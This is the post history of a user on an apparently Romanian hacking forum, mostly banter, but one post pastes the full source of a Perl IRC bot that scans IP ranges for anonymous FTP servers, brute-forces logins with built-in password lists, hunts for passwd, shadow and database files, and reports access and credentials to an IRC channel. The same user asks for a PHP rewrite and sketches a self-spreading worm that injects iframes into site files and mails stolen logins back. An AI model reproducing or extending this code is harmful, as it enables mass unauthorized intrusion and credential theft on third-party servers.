-
Posts
205 -
Joined
-
Last visited
Everything posted by SnaK3
-
si din partea mea ar fi tot "Ethical" sa intreb de CINE anume e CERTIFIED? florin salam?
-
cand ai sa ajungi la 10 redbull + 1kg de cafea + 4 pachete de tigari pe noapte, ai sa ti doresti altceva. mai trist e faptul ca 90% din cei care se avanta in joaca o fac doar din curiozitate sau teribilism sau ca li se pare "cool", dar niciodata sau prea putini trec de stagiul de script kiddies.
-
si care ar fi diferenta intre asta si ping din cmd? te scuteste de scris comanda? faina treaba
-
a incercat cineva sa formateze o discheta(ex) folosind niste comenzi simple din consola de counter strike (ign)? /sarcasm
-
you're the bici and karma is just following you
-
de fapt de fel unii traiesc prin cuvinte pe cand altii n au nici o gara cu El sau subiectul in sine. /reverse psychology.
-
gresit, zeitgeist merita urmarit.
-
and its fucking awesome!
-
#!/usr/bin/perl # # Hollow Chocolate Bunnies From Hell # presenting # becks.pl - FTP scanner by softxor # Version 0.9 # # # becks.pl is an IRC bot that scans for anonymous FTP servers or FTP's witth easy to break # password protection and posts the contents (if anonymous login) or the login data to a specific Channel # # usage: ./ftp_scan 132.311.0.0 # # Greets fly out to: rembrandt, kamooo, evil, zera, litestar, #milw0rm # # Contact: # - WWW: [Solo usuarios registrados pueden ver los links. ] # - MAIL: insertnamehere at gmx dot de # - IRC: #hcbfh @ irc.milw0rm.com # # NOTE: This bot has been written just for fun. If you can't get it running, it's better that way. # # Yet to come: # extern pass/userfile use strict; use warnings; use Net::FTP; ################################# # Global Configuration # ################################# my %config = (max_childs => 40, # Maximal parallel process (recomended up to 100) logging => 1, # If 1, then enable logging use_brute_force => 0, # If 0, then scans only for anonymous ftps indexing => 1, # If 1, creates for every accessed ftp a file with the contents of that ftpd anon_email => 'bleh@blah.co.uk', # Email Address to use in anonymous checking timeout => 1, # Connection timeout in seconds passfile => '', # Missing/not implemented in this version userfile => ''); # Missing/not implemented in this version ################################# # IRC settings # ################################# my %irc = (enabled => 1, # 1 for enable IRC bot server => 'irc.indoirc.net', port => 6667, nickname => 'ftpbotsz', username => 'ftpbotsz ftpbotsz ftbotsz ftpbotsz', # Yes it has to be four times channel => '#hcbfh', nickserv => ''); # Nickserv password ################################# # Data for brute forcing attack # ################################# my @usernames = qw(Administrator upload admin web webmaster user root ftp); my @passwords = qw(password qwertz asdf test test123 1234 1111 12 345678 4321 12345678 123456 secret letmein upload pass support passwort god love 007 admin knight wizard letmein test administrator root web webmaster ftp); # Global declarations my $childs = 0; # Mirc colors my %colors = (white => "\x030", red => "\x034", green => "\x033", gray => "\x0314", yellow=> "\x038", blue => "\x0312", cyan => "\x0311", orange=> "\x0307"); # Parse teh argument! my($ipa, $ipb, $ipc, $ipd) = ($ARGV[0] =~ m/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) or die("Append start IP.\n"); &main(); exit(); sub main { # Start IRC notifying process if ($irc{'enabled'} == 1) { pipe(IN, OUT) || die "Can't create pipe....\n"; OUT->autoflush(1); IN->autoflush(1); if (!fork) { &irc_notify(); } else { close IN; } sleep(30); # needed to let the IRC process join the channel } close IN; print "Start scanning...\nBe patient.\n"; my $OUTPUT_AUTOFLUSH = 1; # To avoid buffering problems with fork() # loop through IPs while (1) { for my $a ($ipa..255) { if ($a == 10 || $a == 198 || $a == 127 || $a == 0 || $a == 172 || $a == 1) { next; } for my $b ($ipb..255) { for my $c ($ipc..255) { for my $d ($ipd..255) { if (fork() == 0) { #print "$a.$b.$c.$d\n"; # Uncomment for verbose output &scan("$a.$b.$c.$d"); exit; } else { $childs++; if ($childs >= $config{'max_childs'}) { wait(); $childs--; } } } # end $d } # end $c } # end $b } #end $a } # end while } #end main() # gets the content of a dir by recursion sub get_dir { my ($cur_dir, $ftp) = @_; my ($content, @found_files, $write, @dirs); $content = ''; # needed my %data_types = (mpg => 'Video', avi => 'Video', xvid=> 'DivX', divx=> 'DivX', mp3 => 'Music', ogg => 'Music', sql => 'MySQL', xxx => 'Pr0n', pdf => 'Pdf', jpg => 'Pictures', gif => 'Pictures', zip => 'Zip', ace => 'Ace', rar => 'Rar', exe => 'Exe', txt => 'Txt', passwd => 'passwd', shadow => 'shadow', htm => 'HTML', mdb => 'AccessDB', bak => 'Backup', xls => 'Excel Sheet'); $ftp->cwd($cur_dir); my @files = $ftp->dir; if ($cur_dir eq '/') { $write = &test_write($ftp); } # $_ isnt working here, because of validity conflicts foreach my $file (@files) { if ($file eq '.' || $file eq '..') { next; } if ($file =~ m/^d[rwx-].*\d\s(.*?)$/) { push (@dirs, $1); } else { # find interesting content foreach my $type (keys %data_types) { if ($file =~ m/$type$/gi) { push (@found_files, $data_types{$type}); } } } } # end for each while(my $cur = pop(@dirs)) { if ($cur_dir eq '/') { $content .= &get_dir('/'.$cur, $ftp); } else { $content .= &get_dir($cur_dir.'/'.$cur, $ftp); } } @found_files = &del_double(@found_files); foreach my $files (@found_files) { $content .= $files.' '; } if ($write) { $content .= "$colors{'red'}Write-Enabled"; } return $content; } sub scan { my ($host) = @_; my $ftp = Net::FTP->new($host,Timeout=>$config{'timeout'}) or return; # grab banner my $banner = $ftp->message; $banner =~ s/\n/ /g; # Anonymous checker if ($ftp->login('anonymous', $config{'anon_email'})) { if ($config{'logging'}) { open(LOG, ">anonymous.log"); } else { open(LOG, '>-'); } if ($config{'indexing'}) { my $content = &get_dir("/", $ftp); if($irc{'enabled'}) { if ($content ne '') { print OUT "$colors{'white'}Anonymous FTP: $colors{'orange'}ftp://$host/ $colors{'white'}Content: $colors{'yellow'}$content$colors{'white'}Banner: $colors{'orange'}$banner\n"; } else { print OUT "$colors{'white'}Anonymous FTP: $colors{'orange'}ftp://$host/ $colors{'white'}Banner: $colors{'orange'}$banner\n"; } } #end irc print LOG "ftp://$host/ Content: $content Banner: $banner\n" } else { if($irc{'enabled'}) { print OUT "$colors{'white'}Anonymous FTP: ftp://$host/ Banner: $colors{'orange'}$banner\n"; } print LOG "ftp://$host/ Banner: $banner\n" } close(LOG); $ftp->quit; return; } # end anonymous # if you're not willing, you'll never grow old! if ($config{'use_brute_force'}) { foreach my $user (@usernames) { foreach my $pass (@passwords) { if($ftp->login($user, $pass)) { if ($config{'logging'}) { open(LOG, ">protected.log"); } else { open(LOG, '>-'); } if($irc{'enabled'}) { print OUT "$colors{'red'}ftp://$user:$pass\@$host/ $colors{'white'}banner: $colors{'orange'}$banner\n"; } print LOG "ftp://$user:$pass\@$host/\n"; close(LOG); $ftp->quit; return; } else { next; } } } } # end brute force return; } # paste incoming ftps on the irc channel sub irc_notify { print "Staring IRC client\n"; close OUT; my $con = IO::Socket::INET->new(PeerAddr=>$irc{'server'}, PeerPort=>$irc{'port'}, Proto=>'tcp', Timeout=>'30') or die("Error: IRC handler cannot connect\n"); if(fork) { # waiting for new ftps, to give them out while (my $answer = <$con>) { if($answer =~ m/^PING \.*?)$/gi) { print $con "PONG :".$1."\n"; } } } print $con "USER $irc{'username'}\r\n"; print $con "NICK $irc{'nickname'}\r\n"; sleep(5); print $con "JOIN $irc{'channel'}\r\n"; print "IRC client is running.\n"; if ($irc{'nickserv'}) { print $con "privmsg nickserv IDENTIFY $irc{'nickserv'}\r\n"; } # make sure we dont ping out while (my $ftp = <IN>) { print $con "privmsg $irc{'channel'} :$ftp\r\n"; } close $con; } # test if ftp is write enabled # return 1 if writing is allowed, # 0 if permitted sub test_write { my $ftp = $_[0]; if ($ftp->mkdir("test")) { $ftp->rmdir("test"); # we want to be 'polite' return 1; } return 0; } # deletes double entries in an array sub del_double { my %all; grep { $all {$_} = 0} @_; return (keys %all); } ceva de genul asta dar nu vreau exec, ci direct php, ptr ca perl execs sunt vizibile/detectabile si n ar avea nici un sens
-
bump?.......
-
sunt curios cam cat de greu ar fi sa faci un script(nu conteaza lb) automat care sa integreze, un simple irc bot(php/py/jv/pl) cu unix cmds + simple brute din cat /etc/passwd gather users.txt si brute with w.lst(external sau internal cu @usernames = qw(Admin,etc,etc) @passwords = qw(password,etc,etc) , dar odata ce prinde o gaura lafel sa intre mai departe si sa repete procesul, fie ca e unix sau windows via ftpcmd cu open 123.x.x.x user pass put autobot.w/e, normal plecand de la baza ca e ftp si modici o fila deja existenta, adaugand un iframe care sa porneasca autobot.w/e cu 127.0.0.1/pwd/autobot.w/e avand un refresh de 12h sau 24h de pref sendmail cu local/ip user pass folosit si url catre 127.0.0.1/pwd/autobot.w/e dupa succ pros; nicio conn directa intre tine si host, command via irc din channel sau priv, stealth, optional poti sa adagi un shell in caz ca primesti mail de succ dar botul nu vine pe canalul x, macar ai url dar de aici se complica prea rau tocmai de asta ar fi mai bine sa ramana doar irc bot-ul cons; mai greu de facut sync intre boti astept ideii si/sau sugestii
-
de prea mult moca te ia cu hai sictir de la stomac, iar cand pune lumea piciorul in prag incepi sa urli, sa scuipi in stanga si ndreapta, si aduci prostul si prea invechitul argument ca vezi domle s ar duce totul de rapa, ca de! nu mai da nimic nimic afara din casa. multi sunt deja obisnuiti sa primeasca totul ca si cum li se cuvine by default, fara un merci ba prostea, un flit asa drept multumire, macar un gest simplu, trist dar prea putin visibil. cand iti dai singur cu barda n coaie ar trebui sa ti asumi si un set de responsabilitati, ca doar na! esti mai mult Om si prea putin maimuta rite? ca de obicei reteta succesului o sa cada in gradina vecinului, iar tu si tu si tu si altii precum, vor fi, veti fi mereu de vina. /trollinftw.
-
cum sa te bata jocul propriu ?))
-
degeaba te imbraci in peste daca tu latri si o arzi la rece
-
sterge ultimul link ca are in logul ala info de internet banking and shet
-
Secretul - The Secret, cartea, filmul, Legea atractiei o sa caut si eu filmul
-
n are nicio treaba una cu alta dat fiind faptul ca aplicatiile in sine sunt de vina ptr ca nu au fost testate cum trebuie sau apar buguri pe parcurs, alea nu tin de tine, tot ce poti face ca enduser e sa ti tii totul cu update la zi, prea putin conteaza daca ala e "hacker adevarat" sau "hacker de carton". si asta e valabila in orice situatie
-
online sau off? actiune - LOCO lafel mai sunt si Dinasty Warriors Vindictus daca vrei mmoRPG cu gfx calumea poti sa incerci ForsakenWorld Prius Loong
-
nimic nu e gratuit in rRomania, vezi ca scrie pe banner cat de "gratuit" e defapt
-
http://diglib.stanford.edu:8091/~testbed/doc2/WebBase/crawl_lists/crawled_hosts.gov http://diglib.stanford.edu:8091/~testbed/doc2/WebBase/crawl_lists/crawled_hosts.uspapers-03-2010 http://diglib.stanford.edu:8091/~testbed/doc2/WebBase/crawl_lists/ have fun
-
Yahoo Messenger 11 - disponibil pentru download
SnaK3 replied to slacker's topic in Stiri securitate
ai primit mail de genul asta de la ei recent? de cand cu gmail le cam tremura chiloteii este? -
250.000 USD, cheltuieli de infractor cibernetic pe trei luni
SnaK3 replied to Silviu's topic in Stiri securitate
lol am un pusti sub mine care si reinstaleaza windowsul de fiecare data cand isi ia ban pe un server de cs... marog trecem peste ca sarim de la subiect, oricum atata timp cat a fost agatat de un antivirus.. deja sare jumate din norma -
250.000 USD, cheltuieli de infractor cibernetic pe trei luni
SnaK3 replied to Silviu's topic in Stiri securitate
pana la primul reinstall nu?